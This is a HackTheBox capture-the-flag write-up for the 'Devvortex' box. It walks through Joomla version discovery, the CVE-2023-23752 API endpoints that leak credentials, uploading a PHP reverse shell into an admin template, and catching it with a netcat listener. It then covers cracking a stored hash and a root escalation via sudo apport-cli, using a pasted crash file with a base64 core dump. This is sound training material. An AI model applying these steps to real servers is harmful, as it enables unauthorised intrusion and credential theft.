Devvortex

Devvortex writeup by Thamizhiniyan C S

Overview

Hello everyone, In this writeup we are going to solve Devvortex from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/Devvortex

Difficulty Level : Easy

Lets Start 🙌

Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.

[ Click Here to learn more about how to connect to vpn and access the boxes. ]

After connecting to the vpn service, click on Join Machine to access the machine’s ip.

After joining the machine you can see the IP Address of the target machine.

---

Reconnaissance

Rustscan

rustscan -a <TARGET> -- T4 -v -A

Nmap Default Scripts

nmap -sC <TARGET>

Results

Ports	Services	Service Version
22	SSH	-
80	HTTP	-

---

Information Gathering - devvortex.htb

From the reconnaissance results, there is website running on port 80. I visited the website but it is redirected to the domain devvortex.htb and the domain name is not resolved.

To access the website, we have to map the domain name to the target IP. We can do this by modifying the /etc/hosts file. Append the underlined line from the image below in /etc/hosts file. The target IP might differ in your case.

After modifying the /etc/hosts file, refresh the website to see the contents of the website.

Active Infrastructure Enumeration

Headers

curl -I "http://${TARGET}"

Whatweb

whatweb -a 1 http://devvortex.htb

Wafw00f

wafw00f http://devvortex.htb

Active Subdomain Enumeration

Subdomain Fuzzing

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.devvortex.htb/

VHost Fuzzing

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://devvortex.htb/ -H 'Host: FUZZ.devvortex.htb' -fs 154

Results

Found no subdomains.

Found a vhost dev.devvortex.htb.

To access the vhost, add add the domain to new subdomain /etc/hosts as before and visit the subdomain in a browser.

---

Information Gathering - dev.devvortex.htb

After modifying the /etc/hosts file, refresh the website to see the contents of the website.

Active Infrastructure Enumeration

Headers

curl -I "http://${TARGET}"

Whatweb

whatweb -a 1 https://dev.devvortex.htb

Waw00f

wafw00f http://devvortex.htb

Results

Nothing interesting found.

---

Enumerating the Website - dev.devvortex.htb

Robots.txt

robots.txt - Found

From the above listed paths, the /administrator path sounds interesting.

So I first visited the /administrator path.

Its a Joomla Administrator Login page.

I first tried for some default credentials like admin:admin, but didn’t work.

Droopescan

Next I used droopescan tool to enumerate the joomla website.

GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.GitHub

droopescan scan joomla --url http://dev.devvortex.htb/

From the results of droopescan , I visited http://dev.devvortex.htb/administrator/manifests/files/joomla.xml to check for version information.

The joomla.xml was accessible and got the joomla version: 4.2.6.

Next I searched for exploits for the above mentioned version and found the following:

CVE-2023-23752

Joomla! v4.2.8 - Unauthenticated information disclosureExploit Database

After taking a look at the exploit, the exploit basically makes requests to the following endpoints and parses the response data and displays it to us:

/api/index.php/v1/users?public=true

/api/index.php/v1/config/application?public=true

So, instead of running the exploit, I directly visited the above endpoints in the browser.

The first endpoint responded with a list of users.

And the second endpoint responded with the configuration of the application which also had the password of the user lewis, that we found in the previous endpoint, who is part of the Super Users group.

---

Initial Access

With credentials lewis:P4ntherg0t1n5r3c0n##, that we found in the enumeration process, I tried to login in the joomla administrator page and was able successfully login.

Since we got access to administrator dashboard, I checked out whether it is possible to inject or modify the code in the available templates as mentioned here:

Joomla - HackTricksbook.hacktricks.xyz

We can see the available templates under the system tab of the dasboard. I decided to try to modify the administrator template.

Next select the following.

In the template customize page you can see a list of available files and options to create, edit, save and delete files.

I decided to create a php file that contains the code to fetch a reverse shell back to us from the server. First click New File.

There is a option to upload a file, I tried to upload a php reverse shell, it didn’t work. So I decided to create a new file and copy the contents of the php reverse shell to the file. To do so enter the file name and choose the extension as php and then click create.

I used the pentest monkey php reverse shell:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzpentestmonkey.net

I copied the contents of the reverse shell and pasted in the editor. Don;t forget to update your tun0 IP address in the reverse shell.

Now click Save&Close and start a netcat listener using the command nc -lvnp 1234.

Now visit the following URL: http://dev.devvortex.htb/administrator/templates/atum/<nameTheFileThatYouCreated>.php and check your reverse shell.

Now we got the reverse shell back.

I first upgraded my shell using the command: python3 -c "import pty;pty.spawn('/bin/bash')”.

We can see that, currently we are the user www-data.

Now its time to look out for privilege escalation vectors.

---

Privilege Escalation

Getting The User Flag

First I checked the available users in the target machine.

There is another user named logan. And I checked the /home/logan folder which has the user flag, but we don’t have permissions to read it.

Next I was looking out for some basic privilege escalation vectors, but got nothing. Then I remembered the about the credentials that we used to login to Joomla which we can use to try to login to the mysql database.

mysql -u lewis -p [ -p - to mention password based login ]

I was able to successfully login and found a database named joomla.

Next I tried to view the available tables using command: show tables;

The above command responded with a long list of which sd4fg_users table got my attention.

Next I viewed the contents of the sd4fg_users table.

It had two users with their password hashes, which seems like a usual linux user account password hash ( blowfish hash ). Since we know that there is another user in the machine named logan, I tried to crack the logan user’s password hash using john.

And I got it cracked and I used the password to login as logan to the target machine via ssh.

I was able to successfully login and also got the user flag.

Getting The Root Flag

Next, again started looking out for privilege escalation vectors. Started with sudo -l command and got the following output.

The user logan can only run /usr/bin/apport-cli with root privileges. apport-cli is basically a tool that generate crash reports. Next I checked the version of the apport-cli

I searched about the above version of apport-cli and found the following commit:

fix: Do not run sensible-pager as root if using sudo/pkexec · canonical/apport@e5f78ccGitHub

which is a POC for to use this tool to escalate our privileges.

I tried it. But I wasn’t able to find the crash file in the /var/crash location. Then I was searching on google on how to create the crash file and got following crash file content from

Official Devvortex DiscussionHack The Box :: Forums

ProblemType: Crash
Architecture: amd64
CrashCounter: 1
Date: Sat Dec  2 09:57:23 2023
DistroRelease: Ubuntu 20.04
ExecutablePath: /usr/bin/sleep
ExecutableTimestamp: 1567679920
ProcCmdline: sleep 13
ProcCwd: /var/crash
ProcEnviron:
 SHELL=/bin/bash
 LANG=en_US.UTF-8
 TERM=xterm-256color
 XDG_RUNTIME_DIR=<set>
 PATH=(custom, no user)
ProcMaps:
 561bbda55000-561bbda57000 r--p 00000000 08:02 20093                      /usr/bin/sleep
 561bbda57000-561bbda5b000 r-xp 00002000 08:02 20093                      /usr/bin/sleep
 561bbda5b000-561bbda5d000 r--p 00006000 08:02 20093                      /usr/bin/sleep
 561bbda5e000-561bbda5f000 r--p 00008000 08:02 20093                      /usr/bin/sleep
 561bbda5f000-561bbda60000 rw-p 00009000 08:02 20093                      /usr/bin/sleep
 561bbf60f000-561bbf630000 rw-p 00000000 00:00 0                          [heap]
 7f5b30817000-7f5b30afd000 r--p 00000000 08:02 19524                      /usr/lib/locale/locale-archive
 7f5b30afd000-7f5b30b1f000 r--p 00000000 08:02 20805                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
 7f5b30b1f000-7f5b30c97000 r-xp 00022000 08:02 20805                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
 7f5b30c97000-7f5b30ce5000 r--p 0019a000 08:02 20805                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
 7f5b30ce5000-7f5b30ce9000 r--p 001e7000 08:02 20805                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
 7f5b30ce9000-7f5b30ceb000 rw-p 001eb000 08:02 20805                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
 7f5b30ceb000-7f5b30cf1000 rw-p 00000000 00:00 0 
 7f5b30cf8000-7f5b30cf9000 r--p 00000000 08:02 20757                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
 7f5b30cf9000-7f5b30d1c000 r-xp 00001000 08:02 20757                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
 7f5b30d1c000-7f5b30d24000 r--p 00024000 08:02 20757                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
 7f5b30d25000-7f5b30d26000 r--p 0002c000 08:02 20757                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
 7f5b30d26000-7f5b30d27000 rw-p 0002d000 08:02 20757                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
 7f5b30d27000-7f5b30d28000 rw-p 00000000 00:00 0 
 7ffe6d90d000-7ffe6d92e000 rw-p 00000000 00:00 0                          [stack]
 7ffe6d953000-7ffe6d956000 r--p 00000000 00:00 0                          [vvar]
 7ffe6d956000-7ffe6d957000 r-xp 00000000 00:00 0                          [vdso]
 ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
ProcStatus:
 Name:	sleep
 Umask:	0002
 State:	S (sleeping)
 Tgid:	2173
 Ngid:	0
 Pid:	2173
 PPid:	1515
 TracerPid:	0
 Uid:	1000	1000	1000	1000
 Gid:	1000	1000	1000	1000
 FDSize:	256
 Groups:	1000 
 NStgid:	2173
 NSpid:	2173
 NSpgid:	2173
 NSsid:	1515
 VmPeak:	    5476 kB
 VmSize:	    5476 kB
 VmLck:	       0 kB
 VmPin:	       0 kB
 VmHWM:	     584 kB
 VmRSS:	     584 kB
 RssAnon:	      68 kB
 RssFile:	     516 kB
 RssShmem:	       0 kB
 VmData:	     176 kB
 VmStk:	     132 kB
 VmExe:	      24 kB
 VmLib:	    1640 kB
 VmPTE:	      48 kB
 VmSwap:	       0 kB
 HugetlbPages:	       0 kB
 CoreDumping:	1
 THP_enabled:	1
 Threads:	1
 SigQ:	0/15317
 SigPnd:	0000000000000000
 ShdPnd:	0000000000000000
 SigBlk:	0000000000000000
 SigIgn:	0000000000000000
 SigCgt:	0000000000000000
 CapInh:	0000000000000000
 CapPrm:	0000000000000000
 CapEff:	0000000000000000
 CapBnd:	0000003fffffffff
 CapAmb:	0000000000000000
 NoNewPrivs:	0
 Seccomp:	0
 Speculation_Store_Bypass:	thread vulnerable
 Cpus_allowed:	3
 Cpus_allowed_list:	0-1
 Mems_allowed:	00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
 Mems_allowed_list:	0
 voluntary_ctxt_switches:	3
 nonvoluntary_ctxt_switches:	2
Signal: 11
Uname: Linux 5.4.0-167-generic x86_64
UserGroups: N/A
_LogindSession: 7
CoreDump: base64
 H4sICAAAAAAC/0NvcmVEdW1wAA==
 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